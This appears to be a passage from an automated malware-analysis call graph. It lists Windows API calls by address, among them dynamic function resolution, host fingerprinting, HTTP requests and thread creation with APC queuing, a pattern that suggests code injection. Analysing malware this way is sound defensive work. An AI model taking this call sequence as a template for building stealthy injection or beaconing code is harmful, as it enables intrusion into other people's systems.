LdrGetProcedureAddress 53889->53890 53891 1ceafc7f025 53890->53891 53892 1ceafc7cce0 LdrGetProcedureAddress 53891->53892 53893 1ceafc7f044 53892->53893 53894 1ceafc7cce0 LdrGetProcedureAddress 53893->53894 53895 1ceafc7f063 53894->53895 53896 1ceafc7cce0 LdrGetProcedureAddress 53895->53896 53897 1ceafc7f082 53896->53897 53898 1ceafc7cce0 LdrGetProcedureAddress 53897->53898 53899 1ceafc7f0a1 53898->53899 53900 1ceafc7cce0 LdrGetProcedureAddress 53899->53900 53901 1ceafc7f0c0 53900->53901 53902 1ceafc7cce0 LdrGetProcedureAddress 53901->53902 53903 1ceafc7f0df 53902->53903 53904 1ceafc7cce0 LdrGetProcedureAddress 53903->53904 53905 1ceafc7f0fe 53904->53905 53906 1ceafc7cce0 LdrGetProcedureAddress 53905->53906 53907 1ceafc7f11d 53906->53907 53908 1ceafc7cce0 LdrGetProcedureAddress 53907->53908 53909 1ceafc7f13c 53908->53909 53910 1ceafc7cce0 LdrGetProcedureAddress 53909->53910 53911 1ceafc7f15b 53910->53911 53912 1ceafc7cce0 LdrGetProcedureAddress 53911->53912 53913 1ceafc7f17a 53912->53913 53914 1ceafc7cce0 LdrGetProcedureAddress 53913->53914 53915 1ceafc7f199 53914->53915 53916 1ceafc7cce0 LdrGetProcedureAddress 53915->53916 53917 1ceafc7f1b8 53916->53917 53918 1ceafc7cce0 LdrGetProcedureAddress 53917->53918 53919 1ceafc7f1d7 53918->53919 53920 1ceafc7cce0 LdrGetProcedureAddress 53919->53920 53921 1ceafc7f1f6 53920->53921 53922 1ceafc7cce0 LdrGetProcedureAddress 53921->53922 53923 1ceafc7f215 53922->53923 53924 1ceafc7cce0 LdrGetProcedureAddress 53923->53924 53925 1ceafc7f234 53924->53925 53926 1ceafc7cce0 LdrGetProcedureAddress 53925->53926 53927 1ceafc7f253 53926->53927 53928 1ceafc7cce0 LdrGetProcedureAddress 53927->53928 53929 1ceafc7f272 53928->53929 53930 1ceafc7cce0 LdrGetProcedureAddress 53929->53930 53931 1ceafc7f291 53930->53931 53932 1ceafc7cce0 LdrGetProcedureAddress 53931->53932 53933 1ceafc7f2b0 53932->53933 53934 1ceafc7cce0 LdrGetProcedureAddress 53933->53934 53935 1ceafc7f2cf 53934->53935 53936 1ceafc7cce0 LdrGetProcedureAddress 53935->53936 53937 1ceafc7f2ee 53936->53937 53938 1ceafc7cce0 LdrGetProcedureAddress 53937->53938 53939 1ceafc7f30d 53938->53939 53940 1ceafc7cce0 LdrGetProcedureAddress 53939->53940 53941 1ceafc7f32c 53940->53941 53942 1ceafc7cce0 LdrGetProcedureAddress 53941->53942 53943 1ceafc7f34b 53942->53943 53944 1ceafc7cce0 LdrGetProcedureAddress 53943->53944 53945 1ceafc7f36a 53944->53945 53946 1ceafc7cce0 LdrGetProcedureAddress 53945->53946 53947 1ceafc7f389 53946->53947 53948 1ceafc7cce0 LdrGetProcedureAddress 53947->53948 53949 1ceafc7f3a8 53948->53949 53950 1ceafc7cce0 LdrGetProcedureAddress 53949->53950 53951 1ceafc7f3c7 53950->53951 53952 1ceafc7cce0 LdrGetProcedureAddress 53951->53952 53953 1ceafc7f3e6 53952->53953 53954 1ceafc7cce0 LdrGetProcedureAddress 53953->53954 53955 1ceafc7f405 53954->53955 53956 1ceafc7cce0 LdrGetProcedureAddress 53955->53956 53957 1ceafc7f424 53956->53957 53958 1ceafc7cce0 LdrGetProcedureAddress 53957->53958 53959 1ceafc7f443 53958->53959 53960 1ceafc7cce0 LdrGetProcedureAddress 53959->53960 53961 1ceafc7f462 53960->53961 53962 1ceafc7cce0 LdrGetProcedureAddress 53961->53962 53963 1ceafc7f481 53962->53963 53964 1ceafc7cce0 LdrGetProcedureAddress 53963->53964 53965 1ceafc7f4a0 53964->53965 53966 1ceafc7cce0 LdrGetProcedureAddress 53965->53966 53967 1ceafc7f4bf 53966->53967 53968 1ceafc7cce0 LdrGetProcedureAddress 53967->53968 53969 1ceafc7f4de 53968->53969 53970 1ceafc7cce0 LdrGetProcedureAddress 53969->53970 53971 1ceafc7f4fd 53970->53971 53972 1ceafc7cce0 LdrGetProcedureAddress 53971->53972 53973 1ceafc7f51c 53972->53973 53974 1ceafc7cce0 LdrGetProcedureAddress 53973->53974 53975 1ceafc7f53b 53974->53975 53976 1ceafc7cce0 LdrGetProcedureAddress 53975->53976 53977 1ceafc7f55a 53976->53977 53978 1ceafc7cce0 LdrGetProcedureAddress 53977->53978 53979 1ceafc7f579 53978->53979 53980 1ceafc7cce0 LdrGetProcedureAddress 53979->53980 53981 1ceafc7f598 53980->53981 53982 1ceafc7cce0 LdrGetProcedureAddress 53981->53982 53983 1ceafc7f5b7 53982->53983 53984 1ceafc7cce0 LdrGetProcedureAddress 53983->53984 53985 1ceafc7f5d6 53984->53985 53986 1ceafc7cce0 LdrGetProcedureAddress 53985->53986 53986->53854 54323 1ceafc94ce0 53987->54323 53992 1ceafca3de0 RtlFreeHeap 53993 1ceafc790af 53992->53993 53994 1ceafca3de0 RtlFreeHeap 53993->53994 53995 1ceafc79110 53994->53995 53996 1ceafca3de0 RtlFreeHeap 53995->53996 53997 1ceafc7916c 53996->53997 53998 1ceafca3de0 RtlFreeHeap 53997->53998 53999 1ceafc791a1 53998->53999 54000 1ceafca3de0 RtlFreeHeap 53999->54000 54001 1ceafc791f1 54000->54001 54002 1ceafca3de0 RtlFreeHeap 54001->54002 54003 1ceafc79222 54002->54003 54004 1ceafca3de0 RtlFreeHeap 54003->54004 54005 1ceafc7925a 54004->54005 54006 1ceafca3de0 RtlFreeHeap 54005->54006 54007 1ceafc792af 54006->54007 54008 1ceafca3de0 RtlFreeHeap 54007->54008 54009 1ceafc792f1 54008->54009 54010 1ceafca3de0 RtlFreeHeap 54009->54010 54011 1ceafc79333 54010->54011 54012 1ceafca3de0 RtlFreeHeap 54011->54012 54013 1ceafc79347 54012->54013 54014 1ceafca3de0 RtlFreeHeap 54013->54014 54015 1ceafc79362 54014->54015 54016 1ceafca3de0 RtlFreeHeap 54015->54016 54017 1ceafc7938e 54016->54017 54018 1ceafca3de0 RtlFreeHeap 54017->54018 54019 1ceafc793c1 54018->54019 54019->53837 54021 1ceafc77f99 54020->54021 54022 1ceafc77fb8 54020->54022 54023 1ceafca3de0 RtlFreeHeap 54021->54023 54024 1ceafc77fda 54022->54024 54025 1ceafca3de0 RtlFreeHeap 54022->54025 54023->54022 54333 1ceafc95560 54024->54333 54025->54024 54028 1ceafc95560 RtlFreeHeap 54033 1ceafc78066 54028->54033 54030 1ceafc7802a 54030->54028 54031 1ceafc78088 54032 1ceafc95560 RtlFreeHeap 54031->54032 54037 1ceafc7809c 54032->54037 54033->54031 54034 1ceafc9b4e0 RtlFreeHeap 54033->54034 54034->54031 54035 1ceafc780be 54036 1ceafc95560 RtlFreeHeap 54035->54036 54041 1ceafc780d2 54036->54041 54037->54035 54039 1ceafc9b4e0 RtlFreeHeap 54037->54039 54038 1ceafc780f4 54040 1ceafc95560 RtlFreeHeap 54038->54040 54039->54035 54045 1ceafc78108 54040->54045 54041->54038 54042 1ceafc9b4e0 RtlFreeHeap 54041->54042 54042->54038 54043 1ceafc7812a 54044 1ceafc95560 RtlFreeHeap 54043->54044 54049 1ceafc7813e 54044->54049 54045->54043 54047 1ceafc9b4e0 RtlFreeHeap 54045->54047 54046 1ceafc78160 54048 1ceafc95560 RtlFreeHeap 54046->54048 54047->54043 54053 1ceafc78174 54048->54053 54049->54046 54050 1ceafc9b4e0 RtlFreeHeap 54049->54050 54050->54046 54051 1ceafc78197 54052 1ceafc95560 RtlFreeHeap 54051->54052 54057 1ceafc781ab 54052->54057 54053->54051 54054 1ceafc9b4e0 RtlFreeHeap 54053->54054 54054->54051 54055 1ceafc781d4 54056 1ceafc95560 RtlFreeHeap 54055->54056 54058 1ceafc781e8 54056->54058 54057->54055 54059 1ceafc9b4e0 RtlFreeHeap 54057->54059 54060 1ceafc7823d 54058->54060 54061 1ceafc8be20 RtlFreeHeap 54058->54061 54059->54055 54062 1ceafc95560 RtlFreeHeap 54060->54062 54063 1ceafc78214 54061->54063 54084 1ceafc78251 54062->54084 54067 1ceafc9b4e0 RtlFreeHeap 54063->54067 54064 1ceafc7838a 54065 1ceafc95560 RtlFreeHeap 54064->54065 54066 1ceafc7839e 54065->54066 54068 1ceafc95560 RtlFreeHeap 54066->54068 54069 1ceafc78235 54067->54069 54074 1ceafc783ba 54068->54074 54070 1ceafc9b4e0 RtlFreeHeap 54069->54070 54070->54060 54071 1ceafc78b86 54071->53839 54072 1ceafc78430 54073 1ceafc95560 RtlFreeHeap 54072->54073 54075 1ceafc78444 54073->54075 54074->54071 54074->54072 54089 1ceafc9b4e0 RtlFreeHeap 54074->54089 54076 1ceafc7846d 54075->54076 54079 1ceafc8be20 RtlFreeHeap 54075->54079 54083 1ceafc95560 RtlFreeHeap 54076->54083 54077 1ceafc78322 54078 1ceafc7835d 54077->54078 54087 1ceafc7a050 RtlFreeHeap 54077->54087 54081 1ceafc9b4e0 RtlFreeHeap 54078->54081 54082 1ceafc78460 54079->54082 54085 1ceafc7837d 54081->54085 54086 1ceafc9b4e0 RtlFreeHeap 54082->54086 54088 1ceafc7848e 54083->54088 54084->54064 54084->54077 54341 1ceafc7a050 54084->54341 54090 1ceafc9b4e0 RtlFreeHeap 54085->54090 54086->54076 54087->54078 54091 1ceafc784b7 54088->54091 54094 1ceafc8be20 RtlFreeHeap 54088->54094 54092 1ceafc78423 54089->54092 54090->54064 54095 1ceafc95560 RtlFreeHeap 54091->54095 54093 1ceafc9b4e0 RtlFreeHeap 54092->54093 54093->54072 54096 1ceafc784aa 54094->54096 54098 1ceafc784d8 54095->54098 54097 1ceafc9b4e0 RtlFreeHeap 54096->54097 54097->54091 54099 1ceafc78501 54098->54099 54100 1ceafc8be20 RtlFreeHeap 54098->54100 54102 1ceafc95560 RtlFreeHeap 54099->54102 54101 1ceafc784f4 54100->54101 54103 1ceafc9b4e0 RtlFreeHeap 54101->54103 54104 1ceafc78522 54102->54104 54103->54099 54105 1ceafc7854b 54104->54105 54106 1ceafc8be20 RtlFreeHeap 54104->54106 54108 1ceafc95560 RtlFreeHeap 54105->54108 54107 1ceafc7853e 54106->54107 54109 1ceafc9b4e0 RtlFreeHeap 54107->54109 54110 1ceafc7856c 54108->54110 54109->54105 54111 1ceafc78595 54110->54111 54112 1ceafc8be20 RtlFreeHeap 54110->54112 54114 1ceafc95560 RtlFreeHeap 54111->54114 54113 1ceafc78588 54112->54113 54116 1ceafc9b4e0 RtlFreeHeap 54113->54116 54115 1ceafc785b6 54114->54115 54117 1ceafc95560 RtlFreeHeap 54115->54117 54116->54111 54118 1ceafc785d2 54117->54118 54118->54071 54119 1ceafc9b4e0 RtlFreeHeap 54118->54119 54120 1ceafc78625 54119->54120 54121 1ceafc9b4e0 RtlFreeHeap 54120->54121 54122 1ceafc7865e 54121->54122 54123 1ceafc95560 RtlFreeHeap 54122->54123 54124 1ceafc78672 54123->54124 54124->54071 54125 1ceafc9b4e0 RtlFreeHeap 54124->54125 54126 1ceafc78797 54125->54126 54127 1ceafc9b4e0 RtlFreeHeap 54126->54127 54128 1ceafc787a4 54127->54128 54129 1ceafc95560 RtlFreeHeap 54128->54129 54130 1ceafc787b8 54129->54130 54130->54071 54131 1ceafc9b4e0 RtlFreeHeap 54130->54131 54132 1ceafc787ec 54131->54132 54133 1ceafc95560 RtlFreeHeap 54132->54133 54134 1ceafc78800 54133->54134 54134->54071 54135 1ceafc9b4e0 RtlFreeHeap 54134->54135 54136 1ceafc7882d 54135->54136 54137 1ceafc95560 RtlFreeHeap 54136->54137 54138 1ceafc78841 54137->54138 54139 1ceafc95560 RtlFreeHeap 54138->54139 54140 1ceafc7885d 54139->54140 54140->54071 54141 1ceafc9b4e0 RtlFreeHeap 54140->54141 54142 1ceafc78897 54141->54142 54143 1ceafc95560 RtlFreeHeap 54142->54143 54144 1ceafc788ab 54143->54144 54144->54071 54145 1ceafc9b4e0 RtlFreeHeap 54144->54145 54146 1ceafc789c8 54145->54146 54147 1ceafc9b4e0 RtlFreeHeap 54146->54147 54148 1ceafc789d5 54147->54148 54149 1ceafc95560 RtlFreeHeap 54148->54149 54158 1ceafc789eb 54149->54158 54150 1ceafc78aec 54155 1ceafc8be20 RtlFreeHeap 54150->54155 54160 1ceafc78b47 54150->54160 54151 1ceafc9b4e0 RtlFreeHeap 54153 1ceafc78b79 54151->54153 54152 1ceafc8be20 RtlFreeHeap 54152->54158 54154 1ceafc9b4e0 RtlFreeHeap 54153->54154 54154->54071 54156 1ceafc78b2a 54155->54156 54159 1ceafc9b4e0 RtlFreeHeap 54156->54159 54157 1ceafc9b4e0 RtlFreeHeap 54157->54158 54158->54071 54158->54150 54158->54152 54158->54157 54159->54160 54160->54151 54162 1ceafc94dc7 GetComputerNameExW 54161->54162 54163 1ceafc94db1 54161->54163 54164 1ceafc94def 54162->54164 54163->54162 54165 1ceafc94df3 GetTokenInformation 54164->54165 54170 1ceafc94e4e 54164->54170 54166 1ceafc94e1c 54165->54166 54165->54170 54167 1ceafc94e3e 54166->54167 54169 1ceafca3de0 RtlFreeHeap 54166->54169 54168 1ceafca3de0 RtlFreeHeap 54167->54168 54168->54170 54169->54167 54345 1ceafc8dfc0 54170->54345 54173 1ceafc94eaa GetNativeSystemInfo 54175 1ceafc94ee8 54173->54175 54176 1ceafc94ed3 54173->54176 54174 1ceafca3de0 RtlFreeHeap 54174->54173 54175->54176 54177 1ceafc94f17 54175->54177 54178 1ceafca3de0 RtlFreeHeap 54176->54178 54179 1ceafca3de0 RtlFreeHeap 54177->54179 54180 1ceafc94f15 54178->54180 54179->54180 54184 1ceafca3de0 RtlFreeHeap 54180->54184 54186 1ceafc94f67 54180->54186 54181 1ceafc94f8f GetAdaptersInfo 54182 1ceafc94fbb 54181->54182 54183 1ceafc94fdd 54181->54183 54185 1ceafc9b4e0 RtlFreeHeap 54182->54185 54183->54182 54189 1ceafc94fea GetAdaptersInfo 54183->54189 54184->54186 54187 1ceafc94fc5 54185->54187 54186->54181 54188 1ceafc9b4e0 RtlFreeHeap 54187->54188 54190 1ceafc94fcd 54188->54190 54189->54182 54191 1ceafc94fff 54189->54191 54190->53842 54191->54182 54192 1ceafca3de0 RtlFreeHeap 54191->54192 54192->54191 54195 1ceafca4759 54193->54195 54194 1ceafca47af 54194->53847 54195->54194 54196 1ceafca47ad NtFreeVirtualMemory 54195->54196 54196->54194 54197->53847 54199 1ceafc78bde 54198->54199 54200 1ceafc7a050 RtlFreeHeap 54199->54200 54201 1ceafc78c5e 54200->54201 54202 1ceafc7a050 RtlFreeHeap 54201->54202 54203 1ceafc78c97 54202->54203 54204 1ceafc9b4e0 RtlFreeHeap 54203->54204 54205 1ceafc78cee 54204->54205 54206 1ceafc78d5c 54205->54206 54207 1ceafc78d44 54205->54207 54208 1ceafc78d5e 54205->54208 54209 1ceafc7a050 RtlFreeHeap 54206->54209 54211 1ceafc78d8b 54206->54211 54207->54206 54212 1ceafc7a050 RtlFreeHeap 54207->54212 54210 1ceafc7a050 RtlFreeHeap 54208->54210 54209->54211 54210->54206 54213 1ceafc9b4e0 RtlFreeHeap 54211->54213 54212->54206 54214 1ceafc78d93 54213->54214 54215 1ceafc9b4e0 RtlFreeHeap 54214->54215 54216 1ceafc78d9b 54215->54216 54217 1ceafc78df0 54216->54217 54218 1ceafc78de9 54216->54218 54349 1ceafc77830 54217->54349 54384 1ceafc86fa0 LdrGetProcedureAddress RtlFreeHeap 54218->54384 54221 1ceafc78dee 54222 1ceafc78e8e 54221->54222 54224 1ceafc8be20 RtlFreeHeap 54221->54224 54373 1ceafc717b0 54222->54373 54226 1ceafc78e23 54224->54226 54225 1ceafc78e32 54227 1ceafc9b4e0 RtlFreeHeap 54225->54227 54228 1ceafc78e2a 54226->54228 54232 1ceafc78e34 54226->54232 54229 1ceafc78ea4 54227->54229 54230 1ceafc9b4e0 RtlFreeHeap 54228->54230 54231 1ceafc9b4e0 RtlFreeHeap 54229->54231 54230->54225 54233 1ceafc78eac 54231->54233 54235 1ceafc9b4e0 RtlFreeHeap 54232->54235 54234 1ceafc9b4e0 RtlFreeHeap 54233->54234 54236 1ceafc78eb4 54234->54236 54237 1ceafc78e5f 54235->54237 54238 1ceafc9b4e0 RtlFreeHeap 54236->54238 54239 1ceafc7a050 RtlFreeHeap 54237->54239 54240 1ceafc78ebc 54238->54240 54241 1ceafc78e71 54239->54241 54240->53847 54242 1ceafc9b4e0 RtlFreeHeap 54241->54242 54243 1ceafc78e79 54242->54243 54385 1ceafc951d0 RtlFreeHeap 54243->54385 54245 1ceafc78e86 54246 1ceafc9b4e0 RtlFreeHeap 54245->54246 54246->54222 54249 1ceafc7fff9 54247->54249 54248 1ceafc72939 54267 1ceafc7f8a0 54248->54267 54249->54248 54250 1ceafc7cce0 LdrGetProcedureAddress 54249->54250 54251 1ceafc80072 54250->54251 54252 1ceafc7cce0 LdrGetProcedureAddress 54251->54252 54253 1ceafc8008d 54252->54253 54254 1ceafc7cce0 LdrGetProcedureAddress 54253->54254 54255 1ceafc800b6 54254->54255 54256 1ceafc7cce0 LdrGetProcedureAddress 54255->54256 54257 1ceafc800d5 54256->54257 54258 1ceafc7cce0 LdrGetProcedureAddress 54257->54258 54259 1ceafc800f4 54258->54259 54260 1ceafc7cce0 LdrGetProcedureAddress 54259->54260 54261 1ceafc80113 54260->54261 54262 1ceafc7cce0 LdrGetProcedureAddress 54261->54262 54263 1ceafc80132 54262->54263 54264 1ceafc7cce0 LdrGetProcedureAddress 54263->54264 54265 1ceafc80151 54264->54265 54266 1ceafc7cce0 LdrGetProcedureAddress 54265->54266 54266->54248 54268 1ceafc7f8da 54267->54268 54269 1ceafc7cce0 LdrGetProcedureAddress 54268->54269 54270 1ceafc7293e 54268->54270 54271 1ceafc7f900 54269->54271 54275 1ceafc83470 54270->54275 54272 1ceafc7cce0 LdrGetProcedureAddress 54271->54272 54273 1ceafc7f91b 54272->54273 54274 1ceafc7cce0 LdrGetProcedureAddress 54273->54274 54274->54270 54277 1ceafc83489 54275->54277 54276 1ceafc83493 54276->53855 54277->54276 54278 1ceafc7cce0 LdrGetProcedureAddress 54277->54278 54279 1ceafc83502 54278->54279 54280 1ceafc7cce0 LdrGetProcedureAddress 54279->54280 54281 1ceafc8351d 54280->54281 54282 1ceafc7cce0 LdrGetProcedureAddress 54281->54282 54283 1ceafc83546 54282->54283 54284 1ceafc7cce0 LdrGetProcedureAddress 54283->54284 54285 1ceafc83565 54284->54285 54286 1ceafc7cce0 LdrGetProcedureAddress 54285->54286 54287 1ceafc83584 54286->54287 54288 1ceafc7cce0 LdrGetProcedureAddress 54287->54288 54289 1ceafc835a3 54288->54289 54290 1ceafc7cce0 LdrGetProcedureAddress 54289->54290 54291 1ceafc835c2 54290->54291 54292 1ceafc7cce0 LdrGetProcedureAddress 54291->54292 54293 1ceafc835e1 54292->54293 54294 1ceafc7cce0 LdrGetProcedureAddress 54293->54294 54295 1ceafc83600 54294->54295 54296 1ceafc7cce0 LdrGetProcedureAddress 54295->54296 54297 1ceafc8361f 54296->54297 54298 1ceafc7cce0 LdrGetProcedureAddress 54297->54298 54299 1ceafc8363e 54298->54299 54300 1ceafc7cce0 LdrGetProcedureAddress 54299->54300 54301 1ceafc8365d 54300->54301 54302 1ceafc7cce0 LdrGetProcedureAddress 54301->54302 54303 1ceafc8367c 54302->54303 54304 1ceafc7cce0 LdrGetProcedureAddress 54303->54304 54305 1ceafc8369b 54304->54305 54306 1ceafc7cce0 LdrGetProcedureAddress 54305->54306 54307 1ceafc836ba 54306->54307 54308 1ceafc7cce0 LdrGetProcedureAddress 54307->54308 54309 1ceafc836d9 54308->54309 54310 1ceafc7cce0 LdrGetProcedureAddress 54309->54310 54311 1ceafc836f8 54310->54311 54312 1ceafc7cce0 LdrGetProcedureAddress 54311->54312 54313 1ceafc83717 54312->54313 54314 1ceafc7cce0 LdrGetProcedureAddress 54313->54314 54315 1ceafc83736 54314->54315 54316 1ceafc7cce0 LdrGetProcedureAddress 54315->54316 54317 1ceafc83755 54316->54317 54318 1ceafc7cce0 LdrGetProcedureAddress 54317->54318 54318->54276 54321 1ceafc7cd1b 54319->54321 54320 1ceafc7cdbf 54320->53858 54321->54320 54322 1ceafc7cd9b LdrGetProcedureAddress 54321->54322 54322->54320 54324 1ceafc78eee CreateMutexExA 54323->54324 54325 1ceafca3de0 54324->54325 54326 1ceafca3e14 54325->54326 54327 1ceafc78f71 54326->54327 54329 1ceafc9b4e0 54326->54329 54327->53992 54330 1ceafc9b523 54329->54330 54331 1ceafc9b4f0 54329->54331 54330->54326 54331->54330 54332 1ceafc9b511 RtlFreeHeap 54331->54332 54332->54330 54334 1ceafc78016 54333->54334 54335 1ceafc9557b 54333->54335 54334->54030 54337 1ceafc8be20 54334->54337 54335->54334 54336 1ceafc9b4e0 RtlFreeHeap 54335->54336 54336->54334 54338 1ceafc8be5c 54337->54338 54339 1ceafc8bea5 54338->54339 54340 1ceafc9b4e0 RtlFreeHeap 54338->54340 54339->54030 54340->54339 54343 1ceafc7a084 54341->54343 54342 1ceafc7a118 54342->54084 54343->54342 54344 1ceafc9b4e0 RtlFreeHeap 54343->54344 54344->54343 54346 1ceafc8dff1 54345->54346 54347 1ceafc9b4e0 RtlFreeHeap 54346->54347 54348 1ceafc8e03d 54346->54348 54347->54348 54348->54173 54348->54174 54350 1ceafc77885 54349->54350 54351 1ceafc7788a InternetOpenW 54349->54351 54350->54351 54352 1ceafc77aed 54351->54352 54353 1ceafc77898 InternetConnectW 54351->54353 54355 1ceafc77b0e InternetCloseHandle 54352->54355 54358 1ceafc77b17 54352->54358 54353->54352 54354 1ceafc778dd HttpOpenRequestW 54353->54354 54354->54352 54357 1ceafc77931 54354->54357 54355->54358 54356 1ceafc77b60 54356->54221 54357->54352 54360 1ceafc779cb HttpSendRequestA 54357->54360 54358->54356 54359 1ceafc77b56 54358->54359 54363 1ceafc77b8c 54358->54363 54359->54356 54361 1ceafc9b4e0 RtlFreeHeap 54359->54361 54360->54352 54362 1ceafc779e4 54360->54362 54361->54356 54367 1ceafc9b4e0 RtlFreeHeap 54362->54367 54372 1ceafc77a24 54362->54372 54364 1ceafc7a050 RtlFreeHeap 54363->54364 54365 1ceafc77ba4 54364->54365 54366 1ceafc9b4e0 RtlFreeHeap 54365->54366 54366->54356 54367->54372 54368 1ceafc77a3f InternetQueryDataAvailable 54369 1ceafc77ae3 54368->54369 54368->54372 54370 1ceafc9b4e0 RtlFreeHeap 54369->54370 54370->54352 54371 1ceafc77a98 RtlReAllocateHeap 54371->54372 54372->54368 54372->54369 54372->54371 54381 1ceafc717f5 54373->54381 54374 1ceafc7180f 54375 1ceafc9b4e0 RtlFreeHeap 54374->54375 54376 1ceafc71820 54375->54376 54377 1ceafc9b4e0 RtlFreeHeap 54376->54377 54379 1ceafc71838 54377->54379 54378 1ceafc9b4e0 RtlFreeHeap 54378->54379 54379->54378 54380 1ceafc7a050 RtlFreeHeap 54379->54380 54382 1ceafc71b61 54379->54382 54380->54379 54381->54374 54386 1ceafc74cd0 54381->54386 54382->54225 54384->54221 54385->54245 54391 1ceafca4360 54386->54391 54390 1ceafc74d58 54390->54381 54393 1ceafca43bd 54391->54393 54392 1ceafc74d3d 54395 1ceafca4ff0 54392->54395 54393->54392 54394 1ceafca444e NtCreateThreadEx 54393->54394 54394->54392 54397 1ceafca5011 54395->54397 54396 1ceafca506c 54396->54390 54397->54396 54398 1ceafca506a NtQueueApcThread 54397->54398 54398->54396 54399 7ff8a8ddcdc0 54400 7ff8a8ddcdcf _Getctype 54399->54400 54401 7ff8a8ddce0b 54399->54401 54400->54401 54402 7ff8a8ddcdf2 HeapAlloc 54400->54402 54406 7ff8a8ddba40 54400->54406 54409 7ff8a8dcd340 9 API calls _invalid_parameter_noinfo_noreturn 54401->54409 54402->54400 54404 7ff8a8ddce09 54402->54404 54410 7ff8a8ddba70 54406->54410 54409->54404 54415 7ff8a8ddcd18 EnterCriticalSection 54410->54415 54412 7ff8a8ddba7d 54413 7ff8a8ddcd78 _isindst LeaveCriticalSection 54412->54413 54414 7ff8a8ddba4e 54413->54414 54414->54400 54429 1ceafc71600 54431 1ceafc7162c 54429->54431 54430 1ceafc71792 RtlExitUserThread 54431->54430 54438 1ceafca3ba0 54431->54438 54433 1ceafc71717 54444 1ceafc89830 54433->54444 54435 1ceafc71735 54436 1ceafc9b4e0 RtlFreeHeap 54435->54436 54437 1ceafc7173d 54436->54437 54437->54430 54439 1ceafca3bc7 54438->54439 54440 1ceafca3bd8 54438->54440 54448 1ceafca3cd0 RtlFreeHeap 54439->54448 54442 1ceafca3c87 54440->54442 54449 1ceafca3cd0 RtlFreeHeap 54440->54449 54442->54433 54446 1ceafc8984d 54444->54446 54445 1ceafc89886 54446->54445 54447 1ceafc8dfc0 RtlFreeHeap 54446->54447 54447->54445 54448->54440 54449->54442 54450 7ff8a8cf9b40 54451 7ff8a8cf9b78 54450->54451 54458 7ff8a8d0eca0 54451->54458 54453 7ff8a8cf9b9d 54454 7ff8a8d0eca0 Concurrency::details::SchedulerBase::GetPolicy 28 API calls 54453->54454 54455 7ff8a8cf9bca 54454->54455 54456 7ff8a8d0eca0 Concurrency::details::SchedulerBase::GetPolicy 28 API calls 54455->54456 54457 7ff8a8cf9bf7 54456->54457 54459 7ff8a8d0ed1a 54458->54459 54460 7ff8a8d0ecc4 54458->54460 54461 7ff8a8d0ed2d 54459->54461 54462 7ff8a8d0edb3 54459->54462 54460->54459 54466 7ff8a8d0ecef 54460->54466 54467 7ff8a8d0ed15 __ExceptionPtr::_CallCopyCtor 54461->54467 54470 7ff8a8d10b90 26 API calls 3 library calls 54461->54470 54471 7ff8a8d0ea10 28 API calls std::_Xinvalid_argument 54462->54471 54469 7ff8a8d0edc0 28 API calls 3 library calls 54466->54469 54467->54453 54469->54467 54470->54467 54472 7ff8a8cf9a80 GetSystemInfo 54475 7ff8a8d96240 54472->54475 54476 7ff8a8d9624a 54475->54476 54477 7ff8a8cf9ab5 54476->54477 54478 7ff8a8d962a0 IsProcessorFeaturePresent 54476->54478 54479 7ff8a8d962b7 54478->54479 54484 7ff8a8d96494 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 54479->54484 54481 7ff8a8d962ca 54485 7ff8a8d96264 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54481->54485 54484->54481 54486 7ff8a8d05320 54543 7ff8a8d02e0c 54486->54543 54488 7ff8a8d05365 54552 7ff8a8d0ba28 39 API calls 2 library calls 54488->54552 54490 7ff8a8d053a6 54553 7ff8a8d10980 28 API calls Concurrency::details::SchedulerBase::GetPolicy 54490->54553 54492 7ff8a8d053b5 54554 7ff8a8d12d50 28 API calls Concurrency::details::SchedulerBase::GetPolicy 54492->54554 54494 7ff8a8d053c2 Concurrency::details::SchedulerBase::GetPolicy 54555 7ff8a8d233dc 43 API calls 54494->54555 54496 7ff8a8d05407 54556 7ff8a8d233dc 43 API calls 54496->54556 54498 7ff8a8d05432 54557 7ff8a8d233dc 43 API calls 54498->54557 54500 7ff8a8d0545c 54558 7ff8a8d233dc 43 API calls 54500->54558 54502 7ff8a8d0552e 54559 7ff8a8d233dc 43 API calls 54502->54559 54504 7ff8a8d05551 54560 7ff8a8d233dc 43 API calls 54504->54560 54506 7ff8a8d05575 54561 7ff8a8d233dc 43 API calls 54506->54561 54508 7ff8a8d055e4 54562 7ff8a8d233dc 43 API calls 54508->54562 54510 7ff8a8d05630 54563 7ff8a8d1415c 43 API calls 54510->54563 54512 7ff8a8d05645 54564 7ff8a8d0323c 27 API calls 3 library calls 54512->54564 54514 7ff8a8d05651 54565 7ff8a8d233dc 43 API calls 54514->54565 54516 7ff8a8d05678 54566 7ff8a8d0ea24 26 API calls 2 library calls 54516->54566 54518 7ff8a8d05687 54567 7ff8a8d233dc 43 API calls 54518->54567 54520 7ff8a8d056a3 54568 7ff8a8d233dc 43 API calls 54520->54568 54522 7ff8a8d056d5 54569 7ff8a8d233dc 43 API calls 54522->54569 54524 7ff8a8d056f1 54570 7ff8a8d233dc 43 API calls 54524->54570 54526 7ff8a8d0572b 54571 7ff8a8d0ea24 26 API calls 2 library calls 54526->54571 54528 7ff8a8d0573a 54529 7ff8a8d0eca0 Concurrency::details::SchedulerBase::GetPolicy 28 API calls 54528->54529 54530 7ff8a8d0575f 54529->54530 54572 7ff8a8d0f7cc 26 API calls std::_Deallocate 54530->54572 54532 7ff8a8d0576f 54573 7ff8a8d11334 EnterCriticalSection LeaveCriticalSection __ExceptionPtr::_CallCopyCtor std::locale::_Locimp::_New_Locimp 54532->54573 54534 7ff8a8d0578d 54574 7ff8a8d0ea24 26 API calls 2 library calls 54534->54574 54536 7ff8a8d0579c 54575 7ff8a8d141cc 40 API calls 2 library calls 54536->54575 54538 7ff8a8d057ae 54576 7ff8a8d0c8e0 28 API calls Concurrency::details::SchedulerBase::GetPolicy 54538->54576 54540 7ff8a8d057d6 54541 7ff8a8d96240 ctype 8 API calls 54540->54541 54542 7ff8a8d057e5 54541->54542 54544 7ff8a8d02eb0 54543->54544 54545 7ff8a8d02e40 54543->54545 54544->54488 54577 7ff8a8d96700 EnterCriticalSection 54545->54577 54547 7ff8a8d02e4c 54547->54544 54548 7ff8a8d02e55 GetCurrentProcess GetProcessTimes 54547->54548 54549 7ff8a8d1da48 28 API calls 54548->54549 54550 7ff8a8d02ea3 54549->54550 54551 7ff8a8d966a0 _Init_thread_footer EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 54550->54551 54551->54544 54552->54490 54553->54492 54554->54494 54555->54496 54556->54498 54557->54500 